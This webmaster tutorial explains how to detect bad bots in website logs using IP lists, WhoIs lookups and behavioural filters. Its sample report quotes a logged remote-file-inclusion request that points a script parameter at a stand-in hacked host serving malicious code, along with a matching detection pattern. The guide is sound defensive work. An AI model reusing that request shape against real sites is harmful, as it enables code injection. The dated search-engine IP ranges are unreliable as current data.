How to find bad bots in website log

Web log statistic software is not that perfect. It is good for a fast look, and to get overall picture of number of visitors visiting your website. But, how many of them are real visitors? Many bots are hiding using "normal" User Agent, referral strings, asking for images and css files, different IPs... to avoid detection.

As mentioned in How to block bad bots , there are a few categories of bots (web robots, web spiders, crawlers...) visiting your website: Search engine spiders, waste of bandwidth bots and bad bots.

Search engine spiders

Search engine bots (spiders) are important for website. Google, Yahoo and MSN/LIVE/BING bots, coming from their IPs, are bots you want on your website (including some other search engines).

Spider detection: All three search engine spiders above could be recognized by User Agent string. When User Agent is detected, next is to check IP (or resolved IP). When this is correct, you can be sure that is the real search engine spider. Not in all cases. IP could be forged, but that is not that often used to worry about. More often you will find User Agent string forged. That is why is good to know IP ranges of search engine spiders. Some IP and resolved IPs you can use to detect search engines web spiders:

Google**: 66.249.64.* to 66.249.95.*, crawl-66-249-* , *.googlebot.com
Yahoo: 72.30.* , 74.6.* , 67.195.* , 66.196.* , *.crawl.yahoo.net , *.inktomisearch.com
MSN/LIVE/BING :65.54.* , 65.55.* , msnbot.msn.com , *.search.live.com

** Fake Google spiders spotted from 66.249.16.* (Google IPs are from 66.249.31.xxx)

These IPs are for example only, for better detection you need to use longer IP, i.e. 65.55.252.* for MSN, to be sure that is not some another spider. Best is to check WhoIs to get IP range.

Bad bots scanner - DIY

Below are examples how to filter good bots and real visitors, to make bad bots detection easier. For these tasks, you can use any programming language, code is not complicated. Personally, I am using Perl scripts (under Windows), first, because I am not professional programmer, second, due to that, I am modifying those scripts all the time, and I don't like to waste time for some fancy forms. With Perl, it could be easier and faster. These examples (scripts) are used on six website logs, all tasks are automated and data shared.

Optional tools:

DNS cache:

Script plugged in web pages, resolving IP to DNS, making DNS cache for download

WhoIs cache:

Software downloading WhoIs info pages to separate folder (using list of IPs supplied)
Script parsing those pages, converting IP address range to IP number range
The same script - adding Low and High IP number, including other Whois data to row in WhoIs cache (pipe delimited or .CSV file)

Formula to convert IP address to IP number is on this page: Convert IP to Country. Here is an example for using WhoIs cache: Unknown IP is converted to IP number, looking for a match in WhoIs cache database (between Low and High IP number). This is done to avoid separate WhoIs requests for every similar IP.

Note: In some WhoIs info, there is CIDR displayed only, without IP address range. To get IP address range from CIDR, since formula is little complicated, I am using subnets.pm (perl module). Search for "convert CIDR to IP range" or similar keywords to find function for your programming language.

Bad bots hunt - Stage 1 - filtering good bots

This example above (search engine spiders IPs) shows how to recognize good bots and how to use that data to filter them. You should have a list of well known IPs. This list includes search engine spiders and other well known bots (other search engines, services, AVirus link scanners). IP addresses listed should be shorter (111.222.333. instead of 11.222.333.444).

First step is to pull out all IPs from weblog, adding them to the temporary file (list of shorted IPs, duplicates deleted). Next step is comparing list of well known IPs with that temporary IPs list, deleting all known IPs from temporary file (IP exists in both files).
Now, what remains in that temporary IPs file are unknown IPs.

We will take each unknown IP from that temporary IP list and perform scan on website log. You should use daily website log, not only due to speed, some filters / conditions (number of requested pages for example) could fail if monthly log is used. Good bot or visitor could become bad bot in that case. If you are in hurry to find who is abusing your website, break that monthly log to daily logs (using dates in monthly log) and scan one at once. Practice is required to fine tune filters/conditions.

Bad bots hunt - Stage 2 - filters

This example scan was performed on daily website log of website with static (.html) pages and protected cgi-bin directory (disallowed in robots.txt). This website is also example of that classic structure.

I hope that you know behaviour of real visitor. His/her browser is requesting one page at the time, including images and css files.

For example, let's take one IP from IP list and scan web log for it. First, we need to match that shorted IP with beginning of logline, to make it faster. When that IP is found, line is parsed and data added to one variable (list of lines with log data), and at the same time filters are checked:

Simple filters (for one log line) are listed below:

Requesting robots.txt - possible web bot
No referral string - possible web bot or visitor from bookmark, proxy, or URL typed (more lines to scan to confirm)
No Mozilla in User Agent string - possible web bot
Requesting script in cgi-bin (protected dir), no referral sting - suspicious - bad bot
POST used, when in script is not allowed, or script is using only GET - possible bad bot - SPAM
Requesting script with some URL added instead of parameter, - script SPAM or botnet attack
User Agent string shows search engine spider, but IP doesn't match - possible page theft, proxy hijack

Simple filters (for all log lines with that IP - all hits) are listed below:

Requesting robots.txt, no images and css, obeys robots.txt - possible good web bot
Requesting robots.txt, no images and css, NOT obeys robots.txt - possible bad web bot, or bad robots.txt syntax
Fast requests (number of html pages hits, small time frame), no robots.txt - possible content scraper or script spammer
Requesting images only - images hotlinked, image scraper

More complicated (cloaked bots):

referral string is the same page as page requested - possible bad bot (botnet)
requested page not linked from page in referral string - bad bot
referral string from another website linked to yours, but real link is not pointing to requested page - bad bot
Changes in User Agent field - different user agents - stealth crawling, possible bad bot (check IP)
Changes in IP address fields (D class, last number) - stealth crawling, possible bad bot (check IP)

There are more filters (conditions) you can use, depending of structure of your website. Like you can see above, there are "possible" and "suspicious". More conditions (combination) should be met to confirm that some IP is the bad bot. That is also the reason why requested pages are listed in report.

Every detected bad IP (including UserAgent) is added to corresponding file (base). Those bases are used later to check returning IPs, and to find what to block by IP. For example, one base contains web bots IPs, second new bots IPs, third bad bots, next - image scrapers, attackers and spammers, and so on.. Bad bots can be added to one database, it is then easy to spot IPs (ranges, when sorted) used for SPAM (bad proxies)

Here is an optional step. When bad IP is found, DNS cache and WhoIs are scanned. If nothing was found there, IP2Country database is checked to get Country.

Anyway, result is HTML report where some HTML codes are added (colors, bolds). Below are parts of report from this website log, just for this text :-)

As you see, this one is already blocked. (error 500). Looking for well known scripts to inject code residing on other hacked website. No php here, sorry...

----------------------------

81.223.126. - 81.223.126. (500) - (Jul)
ATTACK()
libwww-perl/5.803

Country short: AT
Country Full: AUSTRIA

[26/Jul/2008:15:27:14 - (81.223.126.XX) GET /scriptname.php?(includethis)=http://hackedwebsite/filewithmaliciouscode.txt??? HTTP/1.1 (-)

----------------------------

Pattern for match here is (=http) and NOT (yourdomain)

While above is only Country displayed (WhoIs not found), below is one example with WhoIs output.

This below is an example of bad programmed robot (see that version 1.0, I will add beta, too). Not requesting robots.txt, requesting script from protected directory. It is marked as scraper, due to many requests, but not in alert state. Time frame is also O.K., at least 2 seconds. In case that robots.txt was requested, and script (disallowed in robots.txt) is requested too, this bot will be marked different (bad bot).

----------------------------

77.110.52. - 77.110.52. (200) - (Jul)
PAGE SCRAPER (NO robots.txt, CGI ABUSE) HITS:49
Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)

OrgName: Stockholm Univation AB site2
NetName: SE-RIKSNET-UNIVATION2
NetRange: 77.110.52.64 - 77.110.52.XX
NetCIDR: 77.110.0.0/18
Country: SE

[04/Jul/2008:15:10:52 - (77.110.52.XX) GET / HTTP/1.1 (-)
[04/Jul/2008:15:10:56 - (77.110.52.XX) GET /index.html HTTP/1.1 (-)
[04/Jul/2008:15:10:58 - (77.110.52.XX) GET /cgi-bin/rotban/goto.cgi?template HTTP/1.1 (-)
--- other similar requests ---

----------------------------

There are more similar examples. Say, robots.txt is requested from one IP, while pages requests are coming from another IP (obeys robots.txt). In this case, WhoIs cache helps, showing that is the same Company (ISP). There are more false detections (Google and yahoo proxies, for example), where images are requested from one IP and pages from an other. For example, msnbot-media bot was detected as image scraper (in fact, it is image scraper).

With little practice, it is easy to spot difference between false detection and real bad bot

Simple Web site log scanners

If this above sounds complicated for you, there are another ways to scan your weblogs . Above script is used to detect bad bots, but you can use simple script/program only to scan, using list of known bad IPs or User Agents.

List of proxies you can get from proxy websites, where is possible to download proxy list in *.csv format. List of bad User Agents and IPs you can find in various bot blocking scripts. Also, some websites/blogs are publishing their comment spammers and other bad IPs, so you can find some lists there. All you need then, is a little practice.

For suspicious IPs that needs to be looked more closely, you can make simple script/program for scanning monthly weblogs. Another way is to enter IP address (A.B.C.) in Google search form. On that way, it is easy to confirm blog comment spammers IPs, since many blogs (and guestbooks) are recording IPs of visitors.

Related:

How to block bad bots

to top